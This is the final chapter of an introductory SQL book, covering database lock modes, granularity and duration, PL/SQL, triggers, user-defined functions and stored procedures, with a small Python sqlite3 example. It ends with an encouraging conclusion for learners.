There are a few variations of database locks, and several lock properties as well: mode, granularity, and duration. The easiest to define is duration, which specifies the time interval for which the lock applies. Lock modes define the different types of locking, and the mode is determined by the type of resource being locked. A shared lock allows data reads while the row or page lock is in effect. Exclusive locks are for performing data manipulation (DML): they grant exclusive use of a row or page for the execution of a data modification. Exclusive locks cannot be held concurrently; while the data is being actively modified, the page is inaccessible to all other users regardless of their permissions.

Update locks are placed on a single object and allow data reads while the update lock is in place. They also let the database engine decide whether an exclusive lock is necessary once a transaction that modifies the object is committed; this holds only if no other locks are active on the object at the time of the update lock. The update lock is the best of both worlds, allowing data reads and DML transactions to take place at the same time until the actual update is committed to the row or table. These lock types describe page-level locking; there are other types beyond the scope of this text.

The final property of a lock, granularity, specifies the extent of the resource that becomes unavailable. Rows are the smallest objects available for locking and leave the rest of the database free for manipulation. Pages, indexes, tables, extents, and even the entire database are also candidates for locking. An extent is a physical allocation of data, and the database engine will employ this kind of lock when a table or index grows and more disk space is needed. Problems such as lock escalation and deadlock can arise from locking, and we highly encourage readers to pursue a deeper understanding of how these work.

It is worth mentioning that Oracle developed an extension to SQL that allows for procedural instruction using SQL syntax. It is called PL/SQL, and, as we discussed at the beginning of the book, SQL on its own cannot provide procedural instruction because it is a non-procedural language. The extension changes this and expands the capabilities of SQL.
PL/SQL code is used to create and modify advanced SQL constructs such as functions, stored procedures, and triggers. A trigger lets SQL perform a specific operation automatically when a defined condition occurs. Triggers are an advanced feature of SQL and often work in conjunction with logging or alerts to notify principals or administrators when errors occur. Standard SQL lacks control structures, the looping, branching, and decision-making constructs that are available in programming languages such as Java. The Oracle Corporation developed PL/SQL to meet the needs of its database product, which offers functionality similar to other database management systems but is not limited to non-procedural operations.

User-defined functions were mentioned earlier but not defined. T-SQL alone does not adequately cover the creation of user-defined functions, but with programming it is possible to create functions that fit neatly within the same scope as system-defined functions. A user-defined function (UDF) is a programming construct that accepts parameters, performs a task (possibly making use of system-defined parameters), and returns a result. UDFs can be tricky because Microsoft SQL Server also allows stored procedures, which can often accomplish the same task as a user-defined function. A stored procedure is a batch of SQL statements that can be executed in multiple ways and that contains centralized data-access logic. Both of these features are important when working with SQL in production environments.
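A trigger and a user-defined function can both be sketched with Python's sqlite3 module. This is only an analogue: a real server would use CREATE FUNCTION or PL/SQL for the UDF, whereas sqlite3 registers a Python function with the engine through create_function. The table names, the trigger name, and domain_of are all invented for the example.

```python
import sqlite3

con = sqlite3.connect(":memory:")

# A user-defined function: accepts a parameter, performs a task,
# and returns a result, callable from SQL like a built-in function.
def domain_of(email):
    return email.split("@")[-1].lower()

con.create_function("domain_of", 1, domain_of)

con.executescript("""
CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT NOT NULL);
CREATE TABLE audit_log (user_id INTEGER, action TEXT);

-- A trigger: runs automatically after every INSERT on users,
-- a simple form of the logging described above.
CREATE TRIGGER log_new_user AFTER INSERT ON users
BEGIN
    INSERT INTO audit_log (user_id, action) VALUES (NEW.id, 'created');
END;
""")

con.execute("INSERT INTO users (email) VALUES ('Grace@Example.COM')")

# The UDF is usable inside an ordinary SELECT...
domain = con.execute("SELECT domain_of(email) FROM users").fetchone()[0]

# ...and the trigger fired without ever being called explicitly.
log = con.execute("SELECT user_id, action FROM audit_log").fetchall()
```

Nothing in the application ever wrote to audit_log directly; the database engine did it on the application's behalf, which is precisely what makes triggers useful for auditing and alerts.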

Conclusion

Well, we have come to the end of our journey for now. That was the absolute basics of SQL programming, everything you need to know to make your promotion the success you deserve. As you have seen, SQL is somewhat complicated; it certainly isn't the easiest of languages to learn! It will require your full attention if you are to understand the basics, but once you have learned them, you will find it very easy to build things up and move on another stage. If something doesn't make sense to you, don't be afraid to repeat it; go over it and practice the examples until you have a better understanding. The only caution I will add is never to spend too long on a single problem: you won't grasp it any quicker, and you are more likely to go backwards. Even if you work with SQL all day long at your job, learning it is quite another matter. The brain will only take in so much information before it can't go any further, so don't overdo it.

Although there is much to learn, SQL can be a very simple language to use in a database. By taking advantage of the tools in this book, you can successfully maneuver your way through any database. Keep in mind that not every formula works the same in every database; different versions are listed in the book. Although the examples here were written around clients and inventory charts, databases have many uses, and the examples are not to be taken completely literally. You can adapt the information in this book to fit whatever your needs are for any database.

There is plenty to learn when it comes to SQL, but with practice and good knowledge you can be as successful as you decide to be with any database. Just as the English language has many rules to follow, so does SQL. By taking the time to learn the language thoroughly, many things become achievable with the use of a database.
Refer back to the information in this book any time you are stumped by something you are working on. Although SQL can be a complex challenge, patience and practice will help you learn it successfully. By remembering the basic commands and rules of SQL, you will avoid the issues that trip up most people who use it. It is a lot of information to take in, so take it as it comes. Turn to the practical tools you need for whatever you are trying to achieve with the database. When presented with an obstacle or a complex assignment, refer to the tools that will clear up what you need. Take time to fully analyze what is before you while focusing on one thing at a time. Keep an open and simple mind as you move forward, and you will keep any issues from becoming more complicated than they need to be.

As mentioned, SQL can be a simple thing to learn; you just need to take the time to understand fully, and in depth, what everything means. If something doesn't turn out as expected, retrace your steps to find where you might have entered a formula or some of the information incorrectly. By building and maintaining good problem-solving skills, you will place no limit on your success.

One more thing: don't ever be afraid to change the data in the examples. You will learn quicker if you can see for yourself what works and what doesn't. You will see how different results are achieved with different data, and you will gain a better understanding of how a particular statement works.

I want to wish you the very best of luck in learning SQL. I hope that it serves you well in your working life and that it tempts you to move on and learn more about the computer programming languages that every organization loves to use.